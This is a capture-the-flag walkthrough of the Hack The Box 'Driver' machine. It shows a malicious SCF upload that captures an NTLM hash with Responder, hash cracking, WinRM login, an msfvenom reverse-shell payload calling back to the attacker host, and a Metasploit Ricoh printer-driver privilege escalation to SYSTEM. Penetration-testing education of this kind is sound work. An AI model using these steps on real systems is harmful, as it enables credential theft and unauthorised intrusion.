Driver

Join The Best Hacking Community Worldwide | Hack The Box

Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!

www.hackthebox.com

Enumeration

Nmap

ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.238 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.95.238 -oN nmap_tcp -v

PORT     STATE SERVICE      VERSION                                                          
80/tcp   open  http         Microsoft IIS httpd 10.0                                     
| http-auth:                                                                             
| HTTP/1.1 401 Unauthorized\x0D                                                          
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin              
| http-methods:                                                                          
|   Supported Methods: OPTIONS TRACE GET HEAD POST                                       
|_  Potentially risky methods: TRACE                                                     
|_http-server-header: Microsoft-IIS/10.0                                                                                                                                                      
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap scan shows four open ports. Port 80 is hosting an IIS web server, port 135 is running Windows RPC, port 445 is used for SMB, and port 5985 is running Microsoft Windows Remote Management (WinRM).

HTTP

When we browse to port 80, we’re met with an HTTP basic authentication prompt. By trying a common set of credentials, we manage to log in with the username and password combination admin:admin.

The site explains that the MFP Firmware Update Centre performs different tests on printer firmware and drivers. Navigating to the Firmware Updates section, we can see what options are available.

It also notes that any uploaded firmware is placed on a file share and then reviewed manually by the internal team.

Because each file is manually reviewed after being uploaded to an SMB share, we may be able to take advantage of this by uploading a file that triggers a connection back to our own machine over SMB, letting us capture an NTLM hash. Since all files are opened during the review process, we can upload a Shell Command File (.scf) containing a simple instruction to request a file from our host.

Start Responder.

sudo responder -w -I tun0

Next, we upload a .scf file containing the following:

[shell]
Command=2
IconFile=\\10.10.14.7\tools\nc.ico
[Taskbar]
Command=ToggleDesktop

After some time, we receive an NTLM hash belonging to the tony user.

<SNIP>
[SMB] NTLMv2-SSP Client   : 10.129.95.238
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:45e3e02d68a6856b:7FAA4732C6522B7438BC756179781268:010100000000000080EAFBDF1921DC01F45DC1B874A52046000000000200080050004D004900490001001E00570049004E002D0033004B0047004100500033003600490052004B00440004003400570049004E002D0033004B0047004100500033003600490052004B0044002E0050004D00490049002E004C004F00430041004C000300140050004D00490049002E004C004F00430041004C000500140050004D00490049002E004C004F00430041004C000700080080EAFBDF1921DC0106000400020000000800300030000000000000000000000000200000A4A953F1CA63510B170BEE88260856AF7F892C05B2760E8FE4B1E654C5FC48220A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003700000000000000000000000000
<SNIP>

We store the hash and run it through John to crack it, successfully recovering the plaintext password.

└──╼ $john tony_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
l<SNIP>y          (tony)     
1g 0:00:00:00 DONE (2025-09-08 23:44) 33.33g/s 1092Kp/s 1092Kc/s 1092KC/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

Alternatively, hashcat can be used to crack the hash:

└──╼ $hashcat --help | grep -i "ntlm"
<SNIP>
   5600 | NetNTLMv2                                                  | Network Protocol
<SNIP>

└──╼ $hashcat -m 5600 tony_hash /usr/share/wordlists/rockyou.txt 
<SNIP>
TONY::DRIVER:45e3e02d68a6856b:7faa4732c<SNIP>00000000:l<SNIP>y

The hash is successfully cracked, giving us Tony’s credentials. We then perform a credential spray with crackmapexec to confirm WinRM access on the target.

└──╼ $crackmapexec winrm 10.129.95.238 -u tony -p l<SNIP>y
<SNIP>
WINRM       10.129.95.238   5985   DRIVER           [*] Windows 10 Build 10240 (name:DRIVER) (domain:DRIVER)
WINRM       10.129.95.238   5985   DRIVER           [+] DRIVER\tony:liltony (Pwn3d!)

We connect to the remote machine via WinRM, where we find the user flag on Tony’s Desktop.

└──╼ $evil-winrm -i 10.129.95.238 -u tony -p l<SNIP>y
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>

*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
a4f3<SNIP>b418

Privilege Escalation

Now that we’ve got a shell on the target, we can pivot to a Meterpreter session, which is handy for hunting local privilege-escalation paths.

Generate a malicious executable that will call back to our machine and give us a shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=123 -f exe > shell.exe

Next, we configure a listener in msfconsole to catch the incoming connection.

sudo msfconsole -q
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.7
set lport 123
run

We then upload shell.exe to the remote host through our WinRM session and run it to establish the connection.

*Evil-WinRM* PS C:\Users\tony> upload shell.exe 
                                         
Info: Uploading /home/knuckl3s/Driver/shell.exe to C:\Users\tony\shell.exe
                                         
Data: 9556 bytes of 9556 bytes copied
                                         
Info: Upload successful!
*Evil-WinRM* PS C:\Users\tony> .\shell.exe

Looking at msfconsole, we can confirm that a Meterpreter session has been established.

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run
[*] Started reverse TCP handler on 10.10.14.7:123 
[*] Sending stage (203846 bytes) to 10.129.95.238
[*] Meterpreter session 1 opened (10.10.14.7:123 -> 10.129.95.238:49430) at 2025-09-09 00:00:44 -0500

(Meterpreter 1)(C:\Users\tony) > getuid
Server username: DRIVER\tony

Checking the running processes, we notice that we’re on session 0, which indicates the Meterpreter process is operating in a non-interactive, isolated service session.

(Meterpreter 1)(C:\Users\tony) > ps                                                                                                                                        
Process List                                                                             
============   
                                                                          
 PID   PPID  Name                     Arch  Session  User         Path                   
 ---   ----  ----                     ----  -------  ----         ----                   
 0     0     [System Process]                                                            
 4     0     System                                                                      
 100   4692  shell.exe                x64   0        DRIVER\tony  C:\Users\tony\shell.exe  
 <SNIP>
3116  3092  explorer.exe             x64   1        DRIVER\tony  C:\Windows\explorer.exe
<SNIP>

We migrate into a process such as explorer, which is running under session ID 1, indicating it’s an interactive session.

(Meterpreter 1)(C:\Users\tony) > migrate 3116
[*] Migrating from 100 to 3116...
[*] Migration completed successfully.

With a valid interactive Meterpreter session established, we can now run the Local Exploit Suggester module and review its findings. To do this, we background the current session (bg) and then run the following commands:

bg
use /multi/recon/local_exploit_suggester
set session 1
run

(Meterpreter 1)(C:\Windows\system32) > bg                                                                                                                                                     
[*] Backgrounding session 1...                                                           
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> use /multi/recon/local_exploit_suggester                                                                   
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1        
session => 1                                                                             
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run                  
[*] 10.129.95.238 - Collecting local exploits for x64/windows...                         
[*] 10.129.95.238 - 202 exploit checks are being tried...                                
[+] 10.129.95.238 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.                                                                               
[+] 10.129.95.238 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.                                                                         
[+] 10.129.95.238 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.                                                                                
[+] 10.129.95.238 - exploit/windows/local/bypassuac_fodhelper: The target appears to be vulnerable.                                                                               
[+] 10.129.95.238 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.                                                                                   
[+] 10.129.95.238 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.                                                                              
[+] 10.129.95.238 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.                                                                         
[+] 10.129.95.238 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!                
[+] 10.129.95.238 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.                                                                      
[+] 10.129.95.238 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.                                                                        
[+] 10.129.95.238 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1507 build detected!                                        
[+] 10.129.95.238 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.                                                                  
[+] 10.129.95.238 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows 10 version 1507                              
[+] 10.129.95.238 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.                                            
[+] 10.129.95.238 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions                                  
[+] 10.129.95.238 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.                                                                                       
[*] Running check method for exploit 48 / 48

We’re provided with a list of potential exploits. Since the main website referenced printer software, our focus is on those related to printers. Another clue can be uncovered by checking the PowerShell history file.

*Evil-WinRM* PS C:\Users\tony> cat C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
<SNIP>

For Windows PowerShell (v5 and below), PowerShell history is saved in:

C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

For PowerShell Core (pwsh, v6+), it is usually saved in:

C:\Users\tony\AppData\Roaming\Microsoft\PowerShell\PSReadLine\ConsoleHost_history.txt

The PowerShell history shows that a command was run to add a printer, and the driver in use is RICOH PCL6 UniversalDriver V4.23. From our list of potential exploits, we identify one named ricoh_driver_privesc.

We then run the following commands through our Meterpreter session to execute the exploit on the remote machine:

use exploit/windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set session 1
set lhost 10.10.14.7
run

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ricoh_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set session 1
session => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> set lhost 10.10.14.7
lhost => 10.10.14.7
[msf](Jobs:0 Agents:1) exploit(windows/local/ricoh_driver_privesc) >> run
[*] Started reverse TCP handler on 10.10.14.7:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer zIOyI...
[*] Sending stage (203846 bytes) to 10.129.95.238
[+] Deleted C:\Users\tony\AppData\Local\Temp\ZpFVz.bat
[+] Deleted C:\Users\tony\AppData\Local\Temp\headerfooter.dll
[*] Meterpreter session 2 opened (10.10.14.7:4444 -> 10.129.95.238:49431) at 2025-09-09 00:16:29 -0500
[*] Deleting printer zIOyI

(Meterpreter 2)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM

The exploit runs successfully, giving us a shell with NT AUTHORITY\SYSTEM privileges. From here, we can retrieve the root flag located on the Administrator’s Desktop.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
3552<SNIP>dfff

References

HTB Official Walkthrough for Driver